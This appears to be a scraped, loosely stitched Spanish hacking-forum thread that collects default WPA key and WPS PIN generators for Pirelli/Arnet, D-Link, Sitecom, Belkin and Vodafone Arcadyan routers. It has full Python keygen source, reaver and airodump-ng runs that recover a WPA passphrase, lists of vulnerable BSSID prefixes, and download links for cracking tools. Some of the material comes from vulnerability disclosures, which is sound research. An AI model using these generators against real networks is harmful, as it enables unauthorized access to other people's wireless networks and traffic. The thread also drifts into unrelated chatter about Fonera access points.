Temas

[CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina]

Acabo de liberar el algoritmo de Pirelli Arnet, espero que la compañia solucione los problemas causados.

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina
http://ednolo.alumnos.upv.es/?p=1883

*Timeline    :
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure

[Link original:]

Link original:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/




Prueba de concepto:

Código [Seleccionar] Expandir

#!/usr/bin/env python
#
# Calculates the default WPS pin from the BSSID/MAC of many D-Link routers/APs.
#
# Craig Heffner
# Tactical Network Solutions

class WPSException(Exception):
   pass

class WPS(object):

   def checksum(self, pin):
       '''
       Standard WPS checksum algorithm.

       @pin - A 7 digit pin to calculate the checksum for.

       Returns the checksum value.
       '''
       accum = 0

       while pin:
           accum += (3 * (pin % 10))
           pin = int(pin / 10)
           accum += (pin % 10)
           pin = int(pin / 10)

       return ((10 - accum % 10) % 10)

class DLink(object):

   def __init__(self):
       self.wps = WPS()

   def __mac2nic(self, mac):
       '''
       Parses out the NIC portion of an ASCII MAC address.

       @mac_address - An ASCII string MAC address or NIC,
                      with or without delimiters.

       Returns the NIC portion of the MAC address as an int.
       '''
       mac = mac.replace(':', '').replace('-', '')

       if len(mac) == 12:
           try:
               nic = int(mac[6:], 16)
           except ValueError as e:
               raise WPSException("Invalid NIC: [%s]" % mac[6:])
       elif len(mac) == 6:
           try:
               nic = int(mac, 16)
           except ValueError as e:
               raise WPSException("Invalid NIC: [%s]" % mac)
       else:
           raise WPSException("Invalid MAC address: [%s]" % mac)

       return nic

   def generate(self, mac):
       '''
       Calculates the default WPS pin from the NIC portion of the MAC address.

       @mac - The MAC address string.

       Returns the calculated default WPS pin, including checksum.
       '''
       nic = self.__mac2nic(mac)

       # Do some XOR operations on the NIC
       pin = nic ^ 0x55AA55
       pin = pin ^ (((pin & 0x0F) << 4) +
                    ((pin & 0x0F) << 8) +
                    ((pin & 0x0F) << 12) +
                    ((pin & 0x0F) << 16) +
                    ((pin & 0x0F) << 20))

       # The largest possible remainder for any value divided by 10,000,000
       # is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
       pin = pin % int(10e6)

       # If the pin is less than 1,000,000 (i.e., less than 7 digits)
       if pin < int(10e5):
           # The largest possible remainder for any value divided by 9 is
           # 8; hence this adds at most 9,000,000 to the pin value, and at
           # least 1,000,000. This guarantees that the pin will be 7 digits
           # long, and also means that it won't start with a 0.
           pin += ((pin % 9) * int(10e5)) + int(10e5);

       # The final 8 digit pin is the 7 digit value just computed, plus a
       # checksum digit.
       return (pin * 10) + self.wps.checksum(pin)

if __name__ == '__main__':
   import sys

   try:
       mac = sys.argv[1]
   except IndexError:
       print ("Usage: %s <mac>" % sys.argv[0])
       sys.exit(1)

   try:
       print ("Default pin: %d" % DLink().generate(mac))
   except WPSException as e:
       print (str(e))
       sys.exit(1)





Ejemplo de uso:

Código [Seleccionar] Expandir


$ sudo airodump-ng mon0 -c 4

CH  4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1
                                                                     
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                   
C0:A0:BB:EF:B3:D6  -13   0        6        0    0   4  54e  WPA2 CCMP   PSK  dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7   # <--- WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'


Routers afectados:

Confirmed Affected:

   DIR-810L
   DIR-826L
   DIR-632
   DHP-1320
   DIR-835
   DIR-615 revs: B2, C1, E1, E3
   DIR-657
   DIR-827
   DIR-857
   DIR-451
   DIR-655 revs: A3, A4, B1
   DIR-825 revs: A1, B1
   DIR-651
   DIR-855
   DIR-628
   DGL-4500
   DIR-601 revs: A1, B1
   DIR-836L
   DIR-808L
   DIR-636L
   DAP-1350
   DAP-1555

Confirmed Unaffected:

   DIR-815
   DIR-505L
   DIR-300
   DIR-850L
   DIR-412
   DIR-600
   DIR-685
   DIR-817LW
   DIR-818LW
   DIR-803
   DIR-845L
   DIR-816L
   DIR-860L
   DIR-645
   DIR-685
   DAP-1522

[Sitecom firmware encryption and wireless keys]

Sitecom firmware encryption and wireless keys
http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html

Reversing


Algorithm


firmware encryption by using XOR  and its key leakage



Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

Proof-of-concept:
https://drive.google.com/file/d/0BzcoLOYkGWG6WFNhZGV6V2lKcW8/edit

Código [Seleccionar] Expandir

#
# Default WPA key generator for Sitecom WLR-4000/4004 routers
# ===========================================================
#
# Authors:
#   Roberto Paleari     (@rpaleari)
#   Alessandro Di Pinto (@adipinto)
#
# Advisory URL:
#   http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html
#

import argparse
import os
import logging
import sys

# Charsets used for the generation of WPA key by different Sitecom models
CHARSETS = {
   "4000": (
       "23456789ABCDEFGHJKLMNPQRSTUVWXYZ38BZ",
       "WXCDYNJU8VZABKL46PQ7RS9T2E5H3MFGPWR2"
   ),

   "4004": (
       "JKLMNPQRST23456789ABCDEFGHUVWXYZ38BK",
       "E5MFJUWXCDKL46PQHAB3YNJ8VZ7RS9TR2GPW"
   ),
}

def generateKey(mac, model, keylength = 12):
   global CHARSETS
   assert model in CHARSETS
   
   charset1, charset2 = CHARSETS[model]
   assert len(charset1) == len(charset2)

   mac = mac.replace(":", "").decode("hex")
   assert len(mac) == 6

   val = int(mac[2:6].encode("hex"), 16)

   magic1 = 0x98124557
   magic2 = 0x0004321a
   magic3 = 0x80000000

   offsets = []
   for i in range(keylength):
       if (val & 0x1) == 0:
           val = val ^ magic2
           val = val >> 1
       else:
           val = val ^ magic1
           val = val >> 1
           val = val | magic3

       offset = val % len(charset1)
       offsets.append(offset)

   wpakey = ""
   wpakey += charset1[offsets[0]]

   for i in range(0, keylength-1):
       magic3 = offsets[i]
       magic1 = offsets[i+1]

       if magic3 != magic1:
           magic3 = charset1[magic1]
       else:
           magic3 = (magic3 + i) % len(charset1)
           magic3 = charset2[magic3]
       wpakey += magic3

   return wpakey
       

def main():
   global CHARSETS

   # Parse command-line arguments
   parser = argparse.ArgumentParser(formatter_class =
                                    argparse.ArgumentDefaultsHelpFormatter)
   parser.add_argument("-m", "--model", choices = CHARSETS.keys(),
                       required = True, help = "device model")
   parser.add_argument('mac', help = "MAC address")
   args = parser.parse_args()

   # Configure logging
   logging.basicConfig(format = '[%(asctime)s] %(levelname)s : %(message)s',
                       level = logging.DEBUG)

   # Generate SSID and WPA key
   ssid = "Sitecom%s" % args.mac.replace(":", "")[6:].upper()
   wpa = generateKey(args.mac, args.model)

   print "MAC:  %s" % args.mac
   print "SSID: %s" % ssid
   print "WPA:  %s" % wpa


if __name__ == "__main__":
   main()


[Repositorio:]

Despues de leer este PDF, lo he pasado a python. Asi que no está de más compartirlo.


Siento no dar más detalle pero no tengo más tiempo. Leer las referencias en el codigo

Repositorio:

https://bitbucket.org/dudux/belkin4xx

Descarga:

Código [Seleccionar] Expandir


$ git clone https://dudux@bitbucket.org/dudux/belkin4xx.git


Uso:

$ python belkin4xx.py -h
usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
                [-a | -l]

>>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
likely vulnerable, although routers using those macaddresses could be
vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -w [WORDLIST], --wordlist [WORDLIST]
                    Filename to store keys
  -a, --allkeys         Create all possible cases. Definitely recommended if
                    first attempt fails
  -l, --list            List all vulnerable mac address so far

required:
  -b [BSSID], --bssid [BSSID]
                    Target bssid
  -e [ESSID], --essid [ESSID]
                    Target essid. [BelkinXXXX,belkin.XXXX]

(+) Help: python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de


$ python belkin4xx.py -l

• Possible vulnerable targets so far:
  
       essid: Belkin.XXXX
       essid: Belkin_XXXXXX
       essid: belkin.xxxx
       essid: belkin.xxx
  
       bssid: 94:44:52:uv:wx:yz
       bssid: 08:86:3B:uv:wx:yz
       bssid: EC:1A:59:uv:wx:yz
  
  $ python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
  
• Your WPA key might be :
  040D93B0
  
  $ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
  
• Your WPA key might be :
  d49496b9
  
  $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
  
• Your WPA keys might be :
  64949db9
  D40493B0
  649996b9
  649496b9
  d49496b9
  34029DB0
  d49996b9
  D40293B0
  64999db9
  340493B0
  34009DB0
  340093B0
  34049DB0
  340293B0
  D40093B0
  
  
  $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
  $ cat keys.txt
  64949db9
  D40493B0
  649996b9
  649496b9
  d49496b9
  34029DB0
  d49996b9
  D40293B0
  64999db9
  340493B0
  34009DB0
  340093B0
  34049DB0
  340293B0
  D40093B0

Código [Seleccionar] Expandir


git clone https://bitbucket.org/dudux/vodafonearcadyanspain.git


Más detalle en :
http://ednolo.alumnos.upv.es/?p=1760

Código [Seleccionar] Expandir



Background
Around 2011 some routers manufactured by the company Arcadyan were reverse engineered for the staff of seguridadwireless.net. Such research came out for an user called MrFoffly or something like that. This guy obtained an interesting log from an update of Ya.com, he used an firmware image and applied xor FF in raw mode obtaining the following logs. Many routers could be affected for the same vulnerability in the future if this company keeps using same public and patented algorithms.

[code]##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3]  XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2]  XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
###%02X%02X%02X%02X%02X%02X####strWlanMacAddr:%s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d  enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1  XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!


After that,   some of us were a bit stuck but another user, Mambostar, achieved to figure out the algorithm in order to generate 10 possible keys by using the logs as well as the patents [Look at references] . Two years later, some German researchers reverse engineered some Easybox routers finding the same problems. Either using this algorithm or patents as well,  many routers were exposed around all Germany. One year later more or less 2013-2014, and unfortunately, this algorithm has come back to hit some Spanish routers deployed by Vodafone, actually this model ARV752DPW. However really not many of Vodafone's routers have been affected for this vulnerability.

Proof-of-concept
Here you go a proof-of-concept of this vulnerability what I coded due to a small difference in the algorithm. Plenty of code has been reused for previous scripts, please take a look at credits in the code. So far the unique difference  appreciated has been the swapping between zeros by ones at the end of the key generation's algorithm and other stuff very weird like the use of non-hexadecimal characters in the ESSID. If any zero is detected at fifth or sixth byte of the BSSID is automatically transformed into G for the ESSID.

Código [Seleccionar] Expandir


def algorithm(mac):
   '''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
   try:
       bytes = [int(x, 16) for x in mac.split(':')]
       c1 = (bytes[-2] << 8) + bytes[-1]
       (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
       (m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
   except:
       sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")
       sys.exit()

   k1 = ( s7 + s8  + m11 + m12) & (0x0F)
   k2 = ( m9 + m10 + s9  + s10) & (0x0F)      
   x1 = k1  ^ s10
   x2 = k1  ^ s9
   x3 = k1  ^ s8
   y1 = k2  ^ m10
   y2 = k2  ^ m11
   y3 = k2  ^ m12
   z1 = m11 ^ s10
   z2 = m12 ^ s9
   z3 = k1  ^ k2

   wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)

   # Spanish modification in this algorithm
   if wpa.find("0") != -1:
       wpa = wpa.replace("0","1")

   return wpa

Any suggestions or feedback is always pretty much appreciated. Also bugs in the code or any enhancement.

Código [Seleccionar] Expandir


$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
 -h, --help            show this help message and exit
 -v, --version         show program's version number and exit
 -l, --list            List all vulnerable mac address (essid VodafoneXXXX)

required:
 -b [BSSID], --bssid [BSSID]
                       Target mac address

(+) Help: Send me bugs or new targets. Credits buckynet as usual

$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
    bssid: 74:31:70:xx:xx:xx    essid: VodafoneXXXX
    bssid: 84:9C:A6:xx:xx:xx    essid: VodafoneXXXX
    bssid: 88:03:55:xx:xx:xx    essid: VodafoneXXXX
    bssid: 1C:C6:3C:xx:xx:xx    essid: VodafoneXXXX
    bssid: 50:7E:5D:xx:xx:xx    essid: VodafoneXXXX
    bssid: 00:12:BF:xx:xx:xx    essid: VodafoneXXXX

$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID       : VodafoneGG11
[+] BSSID      : 74:31:70:33:00:11
[+] WPA KEY    : 58639129A
[+] WPS PIN    : 75944988





Que alegría ver a *dudux  

https://foro.elhacker.net/hacking_wireless/cuidado_con_los_que_tengais_un_router_vodafone-t406822.0.html
[/code]

[EDITO: Wlandecrypter 1.3 ---> Descargahttp://www.wifiway.org/archivos/wlandecrypter-1.3.1.tar.gzMódulo (por Garcad) -> http://dl.dropbox.com/u/6244383/Wifiway/Modulos/wlandecrypter-1.3.1.lzm]

:http://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlandecrypter-0-7-nuevo!!!/





Descarga


http://www.wifiway.org/archivos/wlandecrypter-0.6.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-0.7.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-0.8.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-0.9.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-1.0.tar.gz



http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.6.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.7.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.8.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.9.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.0.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.1.tar.gz


+info  en........
http://foro.seguridadwireless.net/enlaces_descarga_aplicaciones_wireless_linux/wlandecrypter_06_nuevas_macs-t15700.0.html

Linux -> http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz

windows -> http://www.wifiway.org/archivos/wlandecrypter-1.2.zip


EDITO: Éste es el link de descarga http://www.filedropper.com/wlandecrypter13tar Aunque veas que es 1.3 NO hay diferencia con el 1.2 sino que es una reestructuración.

EDITO: Wlandecrypter 1.3 ---> Descarga

http://www.wifiway.org/archivos/wlandecrypter-1.3.1.tar.gz

Módulo (por Garcad) -> http://dl.dropbox.com/u/6244383/Wifiway/Modulos/wlandecrypter-1.3.1.lzm

pues se ve que vendian a 5 euros un pequeño AP wireless.......e incluso si tienes contrato con fon puedes agregar a un amigo y le regalan un AP...........( no es coña!)

Segun lo visto lleva chipset atheros y se le puede actualizar firmware ,soporta WDS...

ALGUIEN TIENE FONERA???
ALGUN ALMA CARITATIVA CONMIGO??
ALGUIEN ME AGREGA?????
anonimocrust@yahoo.es

http://blog.fon.com/es/